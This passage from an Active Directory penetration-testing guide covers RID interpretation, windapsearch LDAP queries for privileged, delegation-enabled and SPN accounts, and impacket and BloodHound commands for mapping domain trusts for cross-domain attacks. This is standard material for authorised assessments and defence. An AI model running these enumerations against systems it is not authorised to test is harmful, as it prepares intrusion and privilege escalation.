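    domain_sid, rid = split_sid(sid)
    print("domain    :", domain_sid, "rid:", rid, describe_rid(rid))
    for candidate in rid_range(domain_sid, 500, 502):
        print(candidate, "->", describe_rid(split_sid(candidate)[1]))
```

A group whose RID is 512 or 519 is Domain Admins or Enterprise Admins whatever its display name, which is why BloodHound and lookupsid key on RIDs rather than names. Gaps in the RID sequence mark deleted objects, and a RID far above the rest usually means the domain has been through a RID pool re-allocation or a restore.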

Advanced LDAP Enumeration

Purpose: Perform targeted queries for specific attack vectors.

Windapsearch Enumeration

# Basic enumeration
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password>

# Privileged user discovery
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --da
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --privileged-users

# Delegation enumeration
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --unconstrained-users
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --unconstrained-computers
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --constrained-users

# Computer enumeration
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --computers
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --dc

# Custom LDAP queries
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> \
  --custom "(&(objectClass=user)(servicePrincipalName=*))"
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> \
  --custom "(&(objectClass=computer)(operatingSystem=*Server*))"

Requirements: Domain user credentials, LDAP access to domain controllers

Use Case: Targeted enumeration for specific attack vectors, custom queries

Trust Relationship Analysis

Purpose: Map trust relationships for cross-domain attacks.

Trust Enumeration

# Basic trust discovery
python3 getTrusts.py <domain>/<username>:<password> -dc-ip <DC-IP>

# Cross-domain enumeration: -dc-ip must point at a DC of the domain being enumerated, and the credentials must be ones the trust lets you authenticate with there
for domain in $(cat trusted_domains.txt); do
    echo "Enumerating $domain"
    python3 GetADUsers.py $domain/<username>:<password> -all -dc-ip <trusted-domain-DC-IP>
    python3 GetUserSPNs.py $domain/<username>:<password> -dc-ip <trusted-domain-DC-IP>
done

# Trust-specific BloodHound collection
bloodhound-python -u <username> -p <password> -ns <DC-IP> -d <domain.com> -c Trusts

Requirements: Domain user credentials, network access to trusted domains

Use Case: Multi-domain environments with established trust relationships
